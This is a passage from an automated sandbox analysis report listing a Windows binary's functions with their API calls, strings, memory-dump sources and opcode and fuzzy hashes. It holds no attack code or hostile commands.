                                                                • API String ID: 3643093385-0
                                                                • Opcode ID: 41340a1d93cae58c93d7e65189a0b917079dc2c6c478393448de41259a635a48
                                                                • Instruction ID: 12fe3ff945257e14508f4ceda8883418fd77f1456e222826719264046e4c5a32
                                                                • Opcode Fuzzy Hash: 41340a1d93cae58c93d7e65189a0b917079dc2c6c478393448de41259a635a48
                                                                • Instruction Fuzzy Hash: 61F081F1684381AAC7215B566CC5BA63795E3B07F7F23013BF22689363D57848C28739
                                                                Function 004E06B2 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlInitializeCriticalSection.NTDLL ref: 004E06BF
                                                                • RtlInitializeCriticalSection.NTDLL ref: 004E06C7
                                                                • RtlInitializeCriticalSection.NTDLL ref: 004E06CF
                                                                • RtlInitializeCriticalSection.NTDLL ref: 004E06D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection
                                                                • String ID:
                                                                • API String ID: 32694325-0
                                                                • Opcode ID: 0d4f6560271d9faa2fe0ca59a2384c62544e68ac05161767a74af0ad5c25b54c
                                                                • Instruction ID: e6a6bd8d0d9af5aae6614e1b611e23f9338d8e699002c09538a64da2bd39cd8b
                                                                • Opcode Fuzzy Hash: 0d4f6560271d9faa2fe0ca59a2384c62544e68ac05161767a74af0ad5c25b54c
                                                                • Instruction Fuzzy Hash: 40C00231806138AECB963B65FE0684A7F27FB062A03052477A204539348E222C60EFC0
                                                                Function 004DC8F2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 004DC982
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: d261f527e5a14526ce43e8e23a2b04623fad47918318fcb2d2891b08a5a2917e
                                                                • Instruction ID: ed2bb2f592456c3ac6e88b19c576b219728a922f882575fe8004a79d809fe7bf
                                                                • Opcode Fuzzy Hash: d261f527e5a14526ce43e8e23a2b04623fad47918318fcb2d2891b08a5a2917e
                                                                • Instruction Fuzzy Hash: BC515CB190814396CB117725CBB176B7B98AB40711F204EABE485423E9EF7C8C95DA4F
                                                                Function 004E4126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 004E413A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Info
                                                                • String ID: $
                                                                • API String ID: 1807457897-3032137957
                                                                • Opcode ID: 731f48c3a7a7a445644aaf33d773bd1a00500f2f8a73bf7342f2014b281573be
                                                                • Instruction ID: 71c51763917af1eba3464a5af13962174293ddba566a5ddaecb3de985469b83f
                                                                • Opcode Fuzzy Hash: 731f48c3a7a7a445644aaf33d773bd1a00500f2f8a73bf7342f2014b281573be
                                                                • Instruction Fuzzy Hash: DB41CE714041D81EDF128B52CC49BFB7FEADB46745F1400E6E78AC7252C2784988C77A
                                                                Function 004CA0A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wsprintfA.USER32 ref: 004CA0DC
                                                                • MessageBoxA.USER32(00000000,?,error,00000010), ref: 004CA126
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Messagewsprintf
                                                                • String ID: error
                                                                • API String ID: 300413163-1574812785
                                                                • Opcode ID: 3461fc2ce876a255f9b5bbe413afaec7438acb6ca586c2e353a46239d1d95c10
                                                                • Instruction ID: 298ecb71bad3f8301992b0c2b6d386c73045a946b9787b9d899064d252594911
                                                                • Opcode Fuzzy Hash: 3461fc2ce876a255f9b5bbe413afaec7438acb6ca586c2e353a46239d1d95c10
                                                                • Instruction Fuzzy Hash: 5501B578504304ABE750DF14DC96FEB33ADAB85708F04041DF94997281DAB4999487A7